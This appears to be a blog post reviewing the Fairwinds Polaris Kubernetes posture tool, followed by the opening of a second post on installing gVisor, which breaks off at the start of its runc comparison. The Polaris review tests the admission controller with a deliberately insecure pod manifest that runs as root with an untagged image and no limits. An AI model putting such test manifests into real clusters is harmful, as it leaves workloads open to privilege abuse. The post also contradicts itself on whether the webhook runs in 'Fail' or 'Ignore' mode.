<li><p><strong>A CLI/CI scanner</strong> that flags obvious problems before you unleash them on a cluster</p>
</li>
</ul>
<p>The dashboard is… fine. Polished enough, just not particularly inspired. The checks behind it are solid, and the fact that you get dashboard + AC + pipeline scanning in one lightweight package is, objectively, something. It’s worth noting that Polaris mixes in a fair number of non-security checks as well, which we’ll take a look at.</p>
<p>But here’s the honest tl;dr: <strong>Polaris is useful, but it’s not exactly the kind of tool you rearrange your security stack for</strong>. The juice isn't quite worth the squeeze. Still, it's worth a look, if only to confirm that feeling.</p>
<hr />
<h2 id="heading-installing-polaris">Installing Polaris</h2>
<p>Polaris ships as a Helm chart, and the install process is easy. If all you care about is seeing the dashboard and getting a quick read on your workload posture, this is the simplest path.</p>
<h3 id="heading-1-add-the-fairwinds-repo">1. Add the Fairwinds repo</h3>
<pre><code class="lang-bash">helm repo add fairwinds-stable https://charts.fairwinds.com/stable
helm repo update
</code></pre>
<h3 id="heading-2-construct-a-values-file">2. Construct a values file</h3>
<p>This is one of the nicer parts of Polaris: with just a few settings you can get a clean <code>NodePort</code> service for the dashboard and a safely scoped admission controller. The webhook runs in <code>Fail</code> mode and only for namespaces labeled with <code>ac-land</code>, which we’ll set up later for testing.</p>
<p>Save the following as <code>values.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">dashboard:</span>
  <span class="hljs-attr">service:</span>
    <span class="hljs-attr">type:</span> <span class="hljs-string">NodePort</span>

<span class="hljs-attr">webhook:</span>
  <span class="hljs-attr">enable:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">validate:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">mutate:</span> <span class="hljs-literal">false</span>
  <span class="hljs-attr">failurePolicy:</span> <span class="hljs-string">Fail</span>
  <span class="hljs-attr">namespaceSelector:</span>
    <span class="hljs-attr">matchExpressions:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">ac-land</span>
      <span class="hljs-attr">operator:</span> <span class="hljs-string">Exists</span>
</code></pre>
<h3 id="heading-3-install-polaris-dashboard-and-admission-control-enabled">3. Install Polaris (dashboard and admission control enabled)</h3>
<pre><code class="lang-bash">helm upgrade --install polaris fairwinds-stable/polaris --namespace polaris --create-namespace -f values.yaml
</code></pre>
<p>This gives you the Deployment, Service, RBAC, and all the usual Helm chart trimmings. </p>
<h3 id="heading-4-accessing-the-dashboard">4. Accessing the Dashboard</h3>
<p>Grab the IP address via the <code>NodePort</code> service we now have. </p>
<pre><code class="lang-bash">matt@cp:~/fairwinds/polaris$ kubectl get svc -n polaris
NAME                TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)        AGE
polaris-dashboard   NodePort    10.97.42.83     &lt;none&gt;        80:32423/TCP   5m46s
polaris-webhook     ClusterIP   10.104.102.78   &lt;none&gt;        443/TCP        41m
</code></pre>
<p>Now you can hit:</p>
<pre><code class="lang-bash">http://&lt;node-ip&gt;:32423 <span class="hljs-comment">#or whatever your NodePort is</span>
</code></pre>
<p>Success, your dashboard is now running.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1764108762740/47d5b885-4701-445f-a2a3-4682ddcbd2f4.png" alt class="image--center mx-auto" /></p>
<hr />
<h2 id="heading-dashboard-walkthrough">Dashboard Walkthrough</h2>
<p>Let’s start with the annoying part: when you open the Polaris dashboard, the very first thing you see is a giant header linking out to all things Fairwinds/Polaris. And yes — there’s what looks like an embedded ad. Which, for extra spice, leads to a 404. Not a great first impression, but I digress.</p>
<p>Here’s what the dashboard actually gives you:</p>
<h3 id="heading-overview">Overview</h3>
<p>This section shows:</p>
<ul>
<li>IP address  </li>
<li>Overall grade  </li>
<li>A donut chart breaking down Passing, Warning, and Dangerous checks  </li>
</ul>
<p>None of this is clickable.<br />The grade is the most interesting (and the most confusing) part — but we’ll get into that later.</p>
<h3 id="heading-insights">Insights</h3>
<p>This appears to be the same information as the Overview, just in a slightly different layout.<br />There’s no new detail, no navigation, no drill-down.<br />Not sure what purpose this panel serves beyond filling space.</p>
<h3 id="heading-categories">Categories</h3>
<p>This breaks down your results into Polaris’s three buckets:</p>
<ul>
<li><strong>Efficiency</strong>  </li>
<li><strong>Reliability</strong>  </li>
<li><strong>Security</strong></li>
</ul>
<p>It’s a nice view, but still not interactive.<br />The only clickable element is a link that takes you to the generic findings definitions in the Polaris docs — not to the specific finding, not to your workload, just the docs homepage for categories.</p>
<h3 id="heading-namespaces-cluster-resources">Namespaces / Cluster Resources</h3>
<p>This is the part that actually works:</p>
<ul>
<li>You get a list of cluster-wide resources  </li>
<li>Below that, a list of resources grouped by namespace  </li>
<li>Clicking either lets you expand and see which checks passed or failed  </li>
</ul>
<p>You can also filter by namespace, which updates the Overview to show posture for only that slice of the cluster — probably the most genuinely useful interaction in the entire dashboard.</p>
<p>For each individual check, you’ll find a tiny “info” icon, but it just links you back to the generic Polaris docs again. No contextual explanation, no specific guidance.</p>
<h3 id="heading-tldr">TL;DR</h3>
<p><strong>The dashboard is functional, but limited. It's useful in small doses, but not something you’ll rely on day‑to‑day.</strong></p>
<hr />
<h2 id="heading-understanding-the-grade">Understanding the Grade</h2>
<p>The grade is the most interesting and confusing part of the Polaris dashboard. This is all about <a target="_blank" href="https://polaris.docs.fairwinds.com/customization/checks/">checks</a>.</p>
<blockquote>
<p>This is where I'll pretend like I'm a data scientist. But hey I did take statistics once upon a time.</p>
</blockquote>
<p>You get three numbers:</p>
<ul>
<li><strong>Passing</strong> — checks you passed  </li>
<li><strong>Warning</strong> — checks that aren’t ideal, but not catastrophic (I am guessing)  </li>
<li><strong>Dangerous</strong> — checks that are actually bad  </li>
</ul>
<p>You’ll also see a little note under the score explaining that <strong>Warnings get half the weight of dangerous checks</strong>. Sounds simple enough…:</p>
<pre><code class="lang-bash">score = Passing / (Passing + Dangerous + 0.5 * Warning)
</code></pre>
<h3 id="heading-why-this-is-confusing">Why this is confusing</h3>
<p>Warnings are being <strong>scaled down</strong> (only counting as half a “bad” check)…  but <strong>Passing</strong> is <em>not</em> being scaled in any way to match that weighting.</p>
<p>In other words:</p>
<ul>
<li>Dangerous checks hurt you at full weight  </li>
<li>Warnings hurt you at half weight  </li>
<li>Passing checks always count as full credit, even though warnings are being down-weighted in the denominator.</li>
</ul>
<p>So you’re no longer looking at “percentage of checks passed,” or anything intuitive like that. Instead, you’re looking at a <strong>weighted penalty score</strong>, where warnings only count as half a failure, but never count as half a success.</p>
<h3 id="heading-why-i-dont-get-it">Why I don’t get it…</h3>
<p>If warnings are meant to be “half bad,” logically they should also be “half good.”  Not doing this creates a mismatch:</p>
<ul>
<li>The total checks you see (e.g., 826)<br /><strong>≠</strong>  </li>
<li>The denominator used for grading (which shrinks warnings to 0.5)  </li>
</ul>
<p>The end result is a grade that sort of looks like a percentage…</p>
<h3 id="heading-a-quick-example">A Quick Example</h3>
<p>Let’s use simple round numbers so we can see the problem clearly.</p>
<p>Imagine Polaris reports:</p>
<ul>
<li><strong>Passing:</strong> 700  </li>
<li><strong>Warning:</strong> 76  </li>
<li><strong>Dangerous:</strong> 50  </li>
<li><strong>Total checks:</strong> 826  </li>
</ul>
<p>At first glance, you might think the grade is something like:<br />“700 out of 826 checks passed.”</p>
<p>But that’s <em>not</em> what Polaris calculates.</p>
<h4 id="heading-what-polaris-actually-calculates">What Polaris Actually Calculates</h4>
<p>Using their formula:</p>
<pre><code class="lang-bash">score = 700 / (700 + 50 + 0.5 * 76)
</code></pre>
<p>Compute the denominator:</p>
<ul>
<li>Passing = 700  </li>
<li>Dangerous = 50  </li>
<li>Half the Warnings = 38  </li>
</ul>
<pre><code class="lang-bash">denominator = 700 + 50 + 38 = 788
</code></pre>
<p>So the Polaris score becomes:</p>
<pre><code class="lang-bash">score = 700 / 788 ≈ 0.89
</code></pre>
<p>This isn’t “89% of checks passed.”  It’s “passing divided by a weighted count of badness.” That’s why the number feels disconnected from what you see in my opinion.</p>
<p>Ok enough of the data science.</p>
<hr />
<h2 id="heading-testing-the-admission-controller">Testing the Admission Controller</h2>
<p>Seriously, another admission controller? </p>
<p>With Polaris using our safe values file, it’s time to actually test the admission controller and see what it catches. The webhook is running in <code>Ignore</code> mode and scoped to a single namespace, which gives us a safe sandbox to experiment in without risking the cluster.</p>
<h3 id="heading-create-the-test-namespace">Create the test namespace</h3>
<pre><code class="lang-bash">kubectl create namespace ac-land
kubectl label namespace ac-land ac-land=<span class="hljs-literal">true</span>
</code></pre>
<p>Everything we apply here should be intercepted by the Polaris webhook.</p>
<h3 id="heading-deploy-a-known-bad-workload">Deploy a “known bad” workload</h3>
<p>Let’s start with something obviously wrong. This one has no resource limits, running as root, missing probes, the usual Kubernetes crimes:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">bad-pod</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">ac-land</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">app</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">nginx:latest</span>
    <span class="hljs-attr">securityContext:</span>
      <span class="hljs-attr">runAsUser:</span> <span class="hljs-number">0</span>
    <span class="hljs-attr">resources:</span>
      <span class="hljs-attr">requests:</span> {}
      <span class="hljs-attr">limits:</span> {}
</code></pre>
<p>Because we’re running with:</p>
<pre><code>failurePolicy: Fail
</code></pre><p>The pod will not be created because it fails some "Dangerous" checks like "Image tag should be specified." In action we see the following:</p>
<pre><code class="lang-bash">matt@cp:~/fairwinds/polaris$ kubectl apply -f bad-pod.yaml
Error from server (Forbidden): error when creating <span class="hljs-string">"bad-pod.yaml"</span>: admission webhook <span class="hljs-string">"polaris.fairwinds.com"</span> denied the request:
Polaris prevented this deployment due to configuration problems:
- Container app: Image tag should be specified
- Container app: Should not be allowed to run as root
- Container app: Privilege escalation should not be allowed
</code></pre>
<h3 id="heading-check-what-polaris-actually-saw">Check what Polaris actually saw</h3>
<p>Look at the webhook logs:</p>
<pre><code class="lang-bash">matt@cp:~/fairwinds/polaris$ kubectl logs -n polaris -l component=webhook
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/certwatcher/certwatcher.go:139 +0x2e8
    &gt;  sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start.func1()
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:214 +0x28
    &gt;  created by sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start <span class="hljs-keyword">in</span> goroutine 66
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:213 +0x28c
time=<span class="hljs-string">"2025-11-26T19:47:32Z"</span> level=info msg=<span class="hljs-string">"Starting admission request"</span>
time=<span class="hljs-string">"2025-11-26T19:47:32Z"</span> level=info msg=<span class="hljs-string">"Object bad-pod has no owner - running checks"</span>
time=<span class="hljs-string">"2025-11-26T19:47:32Z"</span> level=warning msg=<span class="hljs-string">"no ResourceProvider available, check automountServiceAccountToken will not work in this context (e.g. admission control)"</span>
time=<span class="hljs-string">"2025-11-26T19:47:32Z"</span> level=warning msg=<span class="hljs-string">"no ResourceProvider available, check missingNetworkPolicy will not work in this context (e.g. admission control)"</span>
time=<span class="hljs-string">"2025-11-26T19:47:32Z"</span> level=info msg=<span class="hljs-string">"3 validation errors found when validating bad-pod"</span>
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/certwatcher/certwatcher.go:139 +0x2e8
    &gt;  sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start.func1()
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:214 +0x28
    &gt;  created by sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start <span class="hljs-keyword">in</span> goroutine 43
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:213 +0x28c
time=<span class="hljs-string">"2025-11-26T19:15:16Z"</span> level=info msg=<span class="hljs-string">"Starting admission request"</span>
time=<span class="hljs-string">"2025-11-26T19:15:16Z"</span> level=info msg=<span class="hljs-string">"Object bad-pod has no owner - running checks"</span>
time=<span class="hljs-string">"2025-11-26T19:15:16Z"</span> level=warning msg=<span class="hljs-string">"no ResourceProvider available, check automountServiceAccountToken will not work in this context (e.g. admission control)"</span>
time=<span class="hljs-string">"2025-11-26T19:15:16Z"</span> level=warning msg=<span class="hljs-string">"no ResourceProvider available, check missingNetworkPolicy will not work in this context (e.g. admission control)"</span>
time=<span class="hljs-string">"2025-11-26T19:15:16Z"</span> level=info msg=<span class="hljs-string">"3 validation errors found when validating bad-pod"</span>
</code></pre>
<p>Polaris gives you some useful information, but it’s presented in a pretty strange way. You’ll see a mix of errors, partial details about which validations failed, and a few items that look like failures but are really just warnings. The webhook logs themselves aren’t exactly pleasant. They’re noisy, inconsistent, and don’t meaningfully explain what Polaris actually decided.</p>
<p>And the dashboard? As far as I can tell, none of this admission activity shows up there at all. </p>
<hr />
<h2 id="heading-non-security-checks-efficiency-amp-reliability">Non-Security Checks: Efficiency &amp; Reliability</h2>
<p>Polaris isn’t just about security; it also ships with a wide set of <strong>efficiency</strong> and <strong>reliability</strong> checks. These aren’t going to stop an attacker, but they do help catch the everyday “why is this Deployment so fragile?” issues.</p>
<p>These include things like:</p>
<ul>
<li>Missing CPU or memory <em>requests</em></li>
<li>Missing CPU or memory <em>limits</em></li>
<li>Liveness/readiness probes not defined</li>
<li>Using the <code>latest</code> tag</li>
<li>Pods without disruption budgets</li>
</ul>
<p>These show up in the dashboard under the <strong>Efficiency</strong> and <strong>Reliability</strong> categories. The grouping is a bit high-level, but clicking into a Deployment or Pod gives you the full list of checks, their severity, and Polaris' recommendation.</p>
<p>While these aren’t “security” checks per se, they’re useful guardrails for teams that want basic hygiene without pulling in a more complex policy engine. Just don’t expect deep insight. </p>
<hr />
<h2 id="heading-customizing-polaris-checks">Customizing Polaris Checks</h2>
<p>Polaris ships with a <a target="_blank" href="https://github.com/FairwindsOps/polaris/blob/master/pkg/config/default.yaml">large default ruleset</a>, but not all of it will make sense for you! Fortunately, you can tune or disable checks using a <a target="_blank" href="https://polaris.docs.fairwinds.com/customization/configuration/">simple configuration file</a>.</p>
<h3 id="heading-example-configyaml">Example <code>config.yaml</code></h3>
<pre><code class="lang-yaml"><span class="hljs-attr">checks:</span>
  <span class="hljs-attr">cpuRequestsMissing:</span> <span class="hljs-string">warning</span>
  <span class="hljs-attr">cpuLimitsMissing:</span> <span class="hljs-string">ignore</span>
  <span class="hljs-attr">readinessProbeMissing:</span> <span class="hljs-string">danger</span>
  <span class="hljs-attr">livenessProbeMissing:</span> <span class="hljs-string">warning</span>
  <span class="hljs-attr">tagNotSpecified:</span> <span class="hljs-string">ignore</span>
</code></pre>
<h3 id="heading-applying-it">Applying It</h3>
<pre><code class="lang-bash">helm upgrade --install polaris fairwinds-stable/polaris   -n polaris   -f values.yaml   --set-file config=config.yaml
</code></pre>
<p>Customizing checks helps reduce noise and lets Polaris fit your environment instead of the other way around. Not such a bad thing, I guess.</p>
<hr />
<h2 id="heading-polaris-in-cli-amp-ci">Polaris in CLI &amp; CI</h2>
<p>Polaris can be used as a CLI or CI scanner. This is the mode where its checks are surfaced cleanly and without the noise of dashboards or webhooks.</p>
<h3 id="heading-cli-scan-example">CLI Scan Example</h3>
<p>First install via brew locally.</p>
<pre><code class="lang-bash">brew tap FairwindsOps/tap
brew install FairwindsOps/tap/polaris
</code></pre>
<p>Then run against the <code>bad-pod.yaml</code> file from earlier.</p>
<pre><code class="lang-bash">matt.brown@matt Polaris % polaris audit --audit-path . --format=pretty
Polaris audited Path . at 2025-11-26T12:15:52-08:00
    Nodes: 0 | Namespaces: 0 | Controllers: 1
    Final score: 48

Pod bad-pod <span class="hljs-keyword">in</span> namespace ac-land
    metadataAndInstanceMismatched        😬 Warning
        Reliability - Label app.kubernetes.io/instance must match metadata.name
    hostNetworkSet                       🎉 Success
        Security - Host network is not configured
    hostPIDSet                           🎉 Success
        Security - Host PID is not configured
    hostPathSet                          🎉 Success
        Security - HostPath volumes are not configured
    hostProcess                          🎉 Success
        Security - Privileged access to the host check is valid
    missingNetworkPolicy                 😬 Warning
        Security - A NetworkPolicy should match pod labels and contain applied egress and ingress rules
    priorityClassNotSet                  😬 Warning
        Reliability - Priority class should be <span class="hljs-built_in">set</span>
    procMount                            🎉 Success
        Security - The default /proc masks are <span class="hljs-built_in">set</span> up to reduce attack surface, and should be required
    topologySpreadConstraint             😬 Warning
        Reliability - Pod should be configured with a valid topology spread constraint
    automountServiceAccountToken         😬 Warning
        Security - The ServiceAccount will be automounted
    hostIPCSet                           🎉 Success
        Security - Host IPC is not configured
  Container app
    sensitiveContainerEnvVar             🎉 Success
        Security - The container does not <span class="hljs-built_in">set</span> potentially sensitive environment variables
    tagNotSpecified                      ❌ Danger
        Reliability - Image tag should be specified
    hostPortSet                          🎉 Success
        Security - Host port is not configured
    linuxHardening                       😬 Warning
        Security - Use one of AppArmor, Seccomp, SELinux, or dropping Linux Capabilities to restrict containers using unwanted privileges
    pullPolicyNotAlways                  😬 Warning
        Reliability - Image pull policy should be <span class="hljs-string">"Always"</span>
    insecureCapabilities                 😬 Warning
        Security - Container should not have insecure capabilities
    memoryRequestsMissing                😬 Warning
        Efficiency - Memory requests should be <span class="hljs-built_in">set</span>
    privilegeEscalationAllowed           ❌ Danger
        Security - Privilege escalation should not be allowed
    cpuLimitsMissing                     😬 Warning
        Efficiency - CPU limits should be <span class="hljs-built_in">set</span>
    dangerousCapabilities                🎉 Success
        Security - Container does not have any dangerous capabilities
    livenessProbeMissing                 😬 Warning
        Reliability - Liveness probe should be configured
    memoryLimitsMissing                  😬 Warning
        Efficiency - Memory limits should be <span class="hljs-built_in">set</span>
    notReadOnlyRootFilesystem            😬 Warning
        Security - Filesystem should be <span class="hljs-built_in">read</span> only
    readinessProbeMissing                😬 Warning
        Reliability - Readiness probe should be configured
    runAsPrivileged                      🎉 Success
        Security - Not running as privileged
    runAsRootAllowed                     ❌ Danger
        Security - Should not be allowed to run as root
    cpuRequestsMissing                   😬 Warning
        Efficiency - CPU requests should be <span class="hljs-built_in">set</span>
</code></pre>
<p>Polaris acts like a lightweight linter for Kubernetes YAML. It's fast, easy to plug in, and gives clear feedback on both security and reliability issues before anything ever hits version control or your cluster. Nice touch with the emojis, at least. </p>
<hr />
<h2 id="heading-bonus-a-quick-look-at-pluto-outdated-api-checker">Bonus: A Quick Look at Pluto (Outdated API Checker)</h2>
<p>Pluto is a companion Fairwinds tool that identifies deprecated or soon‑to‑be‑removed Kubernetes API versions. It’s perfect for catching upcoming breakage before your next cluster upgrade.</p>
<h3 id="heading-install-pluto-on-linux-arm64">Install Pluto on Linux (ARM64)</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># 1. Download the ARM64 binary</span>
wget https://github.com/FairwindsOps/pluto/releases/download/v5.22.6/pluto_5.22.6_linux_arm64.tar.gz

<span class="hljs-comment"># 2. Extract the archive</span>
tar -xvf pluto_5.22.6_linux_arm64.tar.gz

<span class="hljs-comment"># 3. Make it executable</span>
chmod +x pluto

<span class="hljs-comment"># 4. Verify</span>
./pluto version
</code></pre>
<p>You should see something like:</p>
<pre><code>Version:<span class="hljs-number">5.22</span><span class="hljs-number">.6</span> Commit:<span class="hljs-number">27</span>a470e10b07302fba2d5a2e6817a08a2b87c0c3
</code></pre><h3 id="heading-test-pluto-using-a-deprecated-api-flowschema-v1beta3">Test Pluto Using a Deprecated API (FlowSchema v1beta3)</h3>
<p>Save this as <strong><code>fc.yaml</code></strong>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">flowcontrol.apiserver.k8s.io/v1beta3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">FlowSchema</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">deprecated-flowschema</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">priorityLevelConfiguration:</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">workload-high</span>
  <span class="hljs-attr">matchingPrecedence:</span> <span class="hljs-number">1000</span>
  <span class="hljs-attr">distinguisherMethod:</span>
    <span class="hljs-attr">type:</span> <span class="hljs-string">ByUser</span>
  <span class="hljs-attr">rules:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">subjects:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">kind:</span> <span class="hljs-string">User</span>
      <span class="hljs-attr">user:</span>
        <span class="hljs-attr">name:</span> <span class="hljs-string">system:serviceaccount:default:default</span>
    <span class="hljs-attr">resourceRules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">verbs:</span> [<span class="hljs-string">"*"</span>]
      <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">"*"</span>]
      <span class="hljs-attr">resources:</span> [<span class="hljs-string">"*"</span>]
    <span class="hljs-attr">nonResourceRules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">verbs:</span> [<span class="hljs-string">"*"</span>]
      <span class="hljs-attr">nonResourceURLs:</span> [<span class="hljs-string">"*"</span>]
</code></pre>
<p>Against the file you’ll see a deprecation warning.</p>
<pre><code class="lang-bash">matt@cp:~/fairwinds/polaris$ ./pluto detect-files -f fc.yaml
NAME                    KIND         VERSION                                REPLACEMENT                       REMOVED   DEPRECATED   REPL AVAIL
deprecated-flowschema   FlowSchema   flowcontrol.apiserver.k8s.io/v1beta3   flowcontrol.apiserver.k8s.io/v1   <span class="hljs-literal">false</span>     <span class="hljs-literal">true</span>         <span class="hljs-literal">false</span>
</code></pre>
<h3 id="heading-pluto-in-your-running-cluster">Pluto in your running cluster</h3>
<p>Pluto can also be run against your live cluster. While this is useful for older cluster versions, against a 1.33 cluster you shouldn't see anything.</p>
<pre><code class="lang-bash">matt@cp:~/fairwinds/polaris$ kubectl version
Client Version: v1.33.6
Kustomize Version: v5.6.0
Server Version: v1.33.6
matt@cp:~/fairwinds/polaris$ ./pluto detect-all-in-cluster -o wide 2&gt;/dev/null
There were no resources found with known deprecated apiVersions.
</code></pre>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>If you’ve made it this far, I commend you. Writing this post felt a bit like sitting five minutes into a panel interview and realizing this isn’t the right candidate, but you still push through out of courtesy.</p>
<p>Polaris is a lightweight posture tool that offers a very surface-level read on workload quality. The dashboard looks fine but doesn’t tell you much, the admission controller functions but provides almost no visibility, and the CLI has pockets of usefulness if you really need a YAML linter with opinions. Furthermore, there isn't really a clear standard it is being evaluated against. Is this compliance, best practice, or something else?</p>
<p>But the reality is simple: there isn’t much here that provides meaningful or lasting value. It’s not deep, it’s not insightful, and it’s not something I’d recommend beyond casual curiosity.</p>
]]></content:encoded></item><item><title><![CDATA[Bubble Wrap for Containers]]></title><description><![CDATA[Kubernetes makes it easy to forget what’s really running underneath. You write a Deployment, set a few limits, and let the control plane take it from there. But once that Pod lands on a node, it’s no longer YAML — it’s syscalls hitting the kernel.
Co...]]></description><link>https://cloudsecburrito.com/bubble-wrap-for-containers</link><guid isPermaLink="true">https://cloudsecburrito.com/bubble-wrap-for-containers</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[containers]]></category><category><![CDATA[Linux]]></category><category><![CDATA[runc]]></category><category><![CDATA[gVisor]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Sun, 23 Nov 2025 21:14:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1763932248575/78952988-55d5-49bf-8b8f-a880e3b89032.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kubernetes makes it easy to forget what’s really running underneath. You write a Deployment, set a few limits, and let the control plane take it from there. But once that Pod lands on a node, it’s no longer YAML — it’s syscalls hitting the kernel.</p>
<p>Containers aren’t magic sandboxes; they’re just processes sharing the same kernel with a light dusting of isolation. That’s fine for speed, but it’s also why “container escapes” can show up (yes, back to my container escape obsession). They’re not exploits so much as reminders that namespaces aren’t armor.</p>
<p>Enter gVisor, Google’s user-space kernel that intercepts syscalls before they ever reach the host. Instead of trusting the Linux kernel to stay polite, gVisor runs your workload inside its own miniature kernel, enforcing isolation at the syscall boundary.</p>
<p>It sits somewhere between <code>runc</code> and a full-blown VM: fast enough to stay in the Kubernetes loop, but restrictive enough to squash most escape paths.</p>
<p>gVisor isn’t new, but it’s worth a <em>burrito</em> look—what it takes to install, where it shines, where it hurts, and why your favorite <code>nsenter</code> trick suddenly stops working.</p>
<hr />
<h2 id="heading-installing-gvisor-on-ubuntu-arm">Installing gVisor on Ubuntu (ARM)</h2>
<p>I’m running this on my usual Mac setup: an Ubuntu ARM VM (Apple Silicon under the hood) with a kubeadm cluster using <code>containerd</code> as the runtime. Running something else should be fairly similar.</p>
<p>The plan:</p>
<ol>
<li>Install the gVisor binaries (<code>runsc</code> and the containerd shim).</li>
<li>Tell <code>containerd</code> about the new runtime.</li>
<li>Restart <code>containerd</code> and sanity-check.</li>
</ol>
<p>Do this on <strong>every node</strong> that will run gVisor-protected workloads.</p>
<h3 id="heading-0-quick-sanity-checks">0. Quick sanity checks</h3>
<p>Make sure you’re on ARM64 and using containerd:</p>
<pre><code class="lang-bash">uname -m
containerd --version
</code></pre>
<h3 id="heading-1-install-the-gvisor-binaries">1. Install the gVisor binaries</h3>
<pre><code class="lang-bash">curl -fsSL https://gvisor.dev/archive.key | sudo gpg --dearmor -o /usr/share/keyrings/gvisor.gpg
<span class="hljs-built_in">echo</span> <span class="hljs-string">"deb [signed-by=/usr/share/keyrings/gvisor.gpg] https://storage.googleapis.com/gvisor/releases release main"</span> | sudo tee /etc/apt/sources.list.d/gvisor.list
sudo apt update
sudo apt install -y runsc gvisor-containerd-shim
</code></pre>
<p>Validate:</p>
<pre><code class="lang-bash">runsc --version
</code></pre>
<h3 id="heading-2-wire-gvisor-into-containerd">2. Wire gVisor into containerd</h3>
<p>Create or edit <code>config.toml</code>:</p>
<pre><code class="lang-bash">cat &lt;&lt;EOF | sudo tee /etc/containerd/config.toml
version = 2
[plugins.<span class="hljs-string">"io.containerd.runtime.v1.linux"</span>]
  shim_debug = <span class="hljs-literal">true</span>
[plugins.<span class="hljs-string">"io.containerd.grpc.v1.cri"</span>.containerd.runtimes.runc]
  runtime_type = <span class="hljs-string">"io.containerd.runc.v2"</span>
[plugins.<span class="hljs-string">"io.containerd.grpc.v1.cri"</span>.containerd.runtimes.runsc]
  runtime_type = <span class="hljs-string">"io.containerd.runsc.v1"</span>
EOF
</code></pre>
<p>Restart containerd:</p>
<pre><code class="lang-bash">sudo systemctl restart containerd
</code></pre>
<hr />
<h2 id="heading-running-kubernetes-pods-with-gvisor">Running Kubernetes Pods with gVisor</h2>
<p>Start by creating a <code>RuntimeClass</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">node.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">RuntimeClass</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">gvisor</span>
<span class="hljs-attr">handler:</span> <span class="hljs-string">runsc</span>
</code></pre>
<p>Apply:</p>
<pre><code class="lang-bash">kubectl apply -f runtimeclass-gvisor.yaml
</code></pre>
<p>Now run a test pod:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">gvisor-test</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">runtimeClassName:</span> <span class="hljs-string">gvisor</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">ubuntu</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu:22.04</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"bash"</span>, <span class="hljs-string">"-c"</span>, <span class="hljs-string">"sleep 36000"</span>]
</code></pre>
<p>Apply and verify:</p>
<pre><code class="lang-bash">kubectl apply -f gvisor-test.yaml
kubectl get pod
</code></pre>
<p>Get the container ID and confirm it’s using gVisor:</p>
<pre><code class="lang-bash">CID=$(kubectl get pod gvisor-test -o jsonpath=<span class="hljs-string">'{.status.containerStatuses[0].containerID}'</span> | sed <span class="hljs-string">'s#containerd://##'</span>)
sudo runsc --root /run/containerd/runsc/k8s.io list | grep <span class="hljs-variable">$CID</span>
</code></pre>
<hr />
<h2 id="heading-gvisor-vs-runc-deep-dive">gVisor vs runc Deep Dive</h2>
<p>Instead of starting with theory, we’re going to follow the Burrito Way™: look at what actually happens first, then decide what we think. Two Ubuntu containers, same image, same command, same cluster:</p>
<ul>
<li>one using <code>runc</code></li>
<li>one using <code>runsc</code></li>
</ul>
<p>The differences show you far more about gVisor’s philosophy than any diagram.</p>
<p>Each section includes:</p>
<ul>
<li>test commands  </li>
<li>what you should observe  </li>
<li>and what it actually means  </li>
</ul>
<h3 id="heading-test-setup-ubuntu-pods-gvisor-vs-runc">Test Setup: Ubuntu Pods (gVisor vs runc)</h3>
<h3 id="heading-baseline-runc">Baseline (runc)</h3>
